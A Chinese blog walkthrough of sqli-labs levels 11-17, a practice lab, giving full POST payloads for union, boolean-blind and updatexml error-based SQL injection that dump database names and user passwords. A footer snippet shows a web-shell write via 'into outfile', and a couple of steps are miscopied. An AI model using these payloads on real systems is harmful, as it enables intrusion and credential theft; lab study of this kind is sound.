sqli-labs Less-11~17

最新推荐文章于 2024-11-07 13:56:20 发布
最新推荐文章于 2024-11-07 13:56:20 发布
阅读量188 收藏
点赞数
分类专栏: sqli-labs基础教程 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38891528/article/details/116667596
版权
  • Less-11:
  • 首先正常登录发现会回显登录名和密码

再利用burp抓包,重新发送表单数据.得到post data

将post data 复制到hackbar进行后续操作更为方便.

  • 判断是否存在注入

加一个’,发现页面有错误回显,可以确定存在注入漏洞.

  • 判断字段数

字段数为2.

  • 判断回显位置

已经知道有两个字段,且其会回显1,2

  • 查库

  • 查表

  • 查列

  • 查字段

 

  • Less-12:
  • 同样的还是先利用burp抓包得到post data

  • 判断是否存在注入

加一个”) #后返回正确,即可知道存在注入漏洞

  • 后续步骤与上一关相似.

以下仅贴post data中的内容:

查字段数: uname=admin") order by 2#&passwd=admin&submit=Submit

查回显: uname=1213") union select 1,2 #&passwd=admin&submit=Submit

查库: uname=1213") union select 1,group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit

查表: uname=1213") union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 #&passwd=admin&submit=Submit

查列: uname=1213") union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #&passwd=admin&submit=Submit

查字段: uname=1213") union select 1,group_concat(concat_ws('~',username,password)) from security.users #&passwd=admin&submit=Submit

 

  • Less-13:
  • 判断注入

此关无回显,只有蓝色字母提示正确.可以看出是bool型盲注。

  • 查字段数

  • 查数据库名字符数

  • 猜解数据库名(先猜第一个,利用>,<去试)

打开burp代理:

打开burp->点击执行:

发送到intruder进行爆破

可以看出此时数据库的第一个字符为s.

后续步骤不再赘述.

  • 猜解表名:

uname=admin') and left((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1)>'a' #&passwd=admin&submit=Submit

  • 猜解列名:

uname=admin') and left((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1)>'a' #&passwd=admin&submit=Submit

  • 猜解字段名:

uname=admin') and left((select concat_ws(0x7e,username,password) from security.users limit 0,1),1)>'a' #&passwd=admin&submit=Submit

 

  • Less-14:
  • 判断注入

  • 查字段数

uname=admin" order by 2#&passwd=admin&submit=Submit

后续内容与上一关基本相同.

  • 查询数据库名字符数:

uname=admin" and length(database())>1 #&passwd=admin&submit=Submit

  • 查库:

uname=admin" and left(database(),1)>'a' #&passwd=admin&submit=Submit

  • 查表:

uname=admin" and left((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1)>'a' #&passwd=admin&submit=Submit

  • 查列:

uname=admin" and left((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1)>'a' #&passwd=admin&submit=Submit

  • 查字段:

uname=admin" and left((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1)>'a' #&passwd=admin&submit=Submit

 

  • Less-15:与上两关一样,均为盲注

判断注入: uname=admin' #&passwd=admin&submit=Submit

查字段数: uname=admin' order by 2#&passwd=admin&submit=Submit

查数据库名字符数: uname=admin' and length(database())>1 #&passwd=admin&submit=Submit

查库: uname=admin' and left(database(),1)>'a' #&passwd=admin&submit=Submit(当前数据库)

或uname=admin' and left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit(所有数据库)

查表: uname=admin' and left((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1)>'a' #&passwd=admin&submit=Submit

查列: uname=admin' and left((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1)>'a' #&passwd=admin&submit=Submit

查字段: uname=admin' and left((select concat_ws(0x7e,username,password) from security.users limit 0,1),1)='D' #&passwd=admin&submit=Submit

同样的可以使用burpsuite去爆破.

 

  • Less-16:

id=(“admin”):与之前几关的差别不大,采用 ”) # 闭合sql语句即可.

 

  • 补充知识:

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。

第三个参数:new_value,String格式,替换查找到的符合条件的数据

作用:改变文档中符合条件的节点的值

改变XML_document中符合XPATH_string的值

而我们的注入语句为:

 select updatexml(1,concat(0x7e,(SELECT username from security.users limit 0,1),0x7e),1);

其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出

ERROR 1105 (HY000): XPATH syntax error: '~Dumb~'

 

  • Less-17:
  • 首先,我们知道这是一个修改密码的页面,则我们需要在知道username的前提下,去进行注入。

且其对username的值进行了转义,因此我们转向password参数,发现存在注入漏洞。

因此我们可以利用上面讲到的updatexml函数进行渗透。

  • 查库:

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(database())),1)#&submit=Submit

  • 查表

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(database())),1)#&submit=Submit

  • 查列

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1)#&submit=Submita

  • 查字段

首先试了一下直接查:uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select password from security.users limit 1,1)),1)#&submit=Submita

发现报错信息。试着加一层select。

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select password from(select password from security.users limit 1,1))),1)#&submit=Submita

还是报错,但是提示需要一个别名。

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select password from(select password from security.users limit 1,1)0pts)),1)#&submit=Submita

 

成功获得密码。

 

参考视频链接:https://www.bilibili.com/video/BV1yJ411g7hh?p=12&spm_id_from=pageDriver

sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs闯关记录(Less11-Less15)
BROTHERYY的博客
08-19 260
Basic InjectionLess-11 Error Based-StringLess-12 Error Based-DoubleLess-13 Double Injection-String-with twistLess-14 Double Injection-Double quotes-StringLess-15 Blind-Boolian Based-String Less-11 Error Based-String 这里是用的post传递参数,所以在url上不会显示数据了,使用burp进行抓包来
Sqlmap入门爆库、爆表、爆字段、爆记录
weixin_56306210的博客
10-31 2775
Sqlmap爆库、爆表、爆字段、爆记录
sqli-labs靶场练习Less-11~20(持续更新)--ch4nge
ch4nge
10-26 921
Less11-19 作者:ch4nge 目录Less11-19Less11·post·U手注sqlmapLess12·post·ULess13·post·E手注sqlmapLess 14·post·ELess15·post·BLess16·post·BLess 17·post·ELess 18·UA·E解法1解法2sqlmapLess19·referer·E Less11·post·U 手注 这道题给出来了一个登录框 源码: @$sql="SELECT username, password FROM us
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
sqli-labs PoC 脚本.rar
08-09
课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料...
如何产看SQL 查询的执行时间
技术广场
11-05 341
对于查看毫秒级执行时间,推荐使用 SET STATISTICS TIME或 GETDATE()计时方法。这两种方法可以直接在 SQL Server Management Studio 中快速应用。
PostgreSQL (八) 创建分区
fracong的博客
11-04 296
分区的新建和查询
sql之count()函数解析
JustinMars的博客
11-07 154
COUNT(*):统计所有行。 COUNT(column_name):统计某列的非 NULL 值。 COUNT(DISTINCT column_name):统计某列中不重复的非 NULL 值。
SQL50】day 1
m0_73629042的博客
11-05 297
使用不等于符号无法筛选null情况。
6.qsqlquerymodel源码分析
adsd1233123的博客
11-06 423
qsqlquerymodel 继承与qabstracttablemodel 负责填充数据 浅析qsqlquery 你会发现提供的构造qsqlquery中如果 携带sql字符串语句则自动执行,具体请看 所以在使用qsqlquery的过程中如果传入sql语句则不用手动执行 否则就需要自己执行 数据返回 sqlResult 是由不同的数据库驱动提供的 而为什么qsqlquery可以使用qsqlresult的protected东西,虽然不是相互继承关系 但因为在qsqlresult中声明了qsqlquery为友元类
SQL Server 数据太多如何优化
最新发布
威哥爱编程,CSDN 博客专家、全栈领域新星创作者、华为 HDE,愿交天下 IT 技术爱好者
11-07 637
并行查询:通过将查询任务拆分为多个子任务,并行地处理,可以显著提高查询性能。并发查询:适用于在多个查询任务之间进行并发执行,无需等待每个查询任务逐个完成,可以加快整体查询速度。通过结合并行查询和并发查询策略,我们可以显著提高电商平台或其他业务系统的查询响应速度,尤其是在高并发的环境中,保证系统的高效性。以上11种优化方案供你参考,优化 SQL Server 数据库性能得从多个方面着手,包括硬件配置、数据库结构、查询优化、索引管理、分区分表、并行处理等。
sql server 文件备份恢复
woshilys的专栏
11-04 255
sql server 文件 文件组备份恢复
SQL 数据结构查询
weixin_53720617的博客
11-04 218
WHERE。
sql-Incorrect string value
记录学习笔记使用~
11-04 227
数据库表插入中文字符时报错,意味着你尝试将一个不符合当前列字符集的字符串值插入到数据库表的某个列中。在这个例子中,‘\xE5\xBC\xA0\xE4\xB8\x89’ 是“张”字的UTF-8编码,而列’name’可能使用的是Latin1字符集或其他不支持UTF-8的字符集。确认数据库和表的字符集设置是否支持存储UTF-8字符。
第四篇: 用Python和SQL在BigQuery中进行基础数据查询
qq_41611586的博客
11-03 731
本文介绍了如何使用BigQuery和SQL进行电商数据分析,展示了通过简单的SQL查询、数据过滤、排序和聚合来获取商业洞见的基本方法。对于想要使用SQL查询大规模数据的读者来说,BigQuery的公共数据集资源丰富、操作简便,是学习和实践SQL基础操作的理想平台。以下是一个通过Python和BigQuery进行基础SQL查询的实际案例,我们将使用Google的一个公共数据集,并以一个简单的查询示例来演示SQL在BigQuery中的应用,涵盖查询、过滤、排序和聚合操作。
Oracle与SQL Server的语法区别
全栈师的博客
11-01 522
不过需要注意的是,CONVERT函数在Oracle 12c及以上版本中已经被弃用,建议使用其等价函数NLS_CONVERT来替代。其中,link_to_source是链接的名称,source_user和source_password是源数据库的用户名和密码,source_database是源数据库的连接字符串。在Oracle中执行跨数据库查询可以通过数据库链接(Database Link)来实现。其中,table_name是源数据库中的表名,link_to_source是之前创建的数据库链接。
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值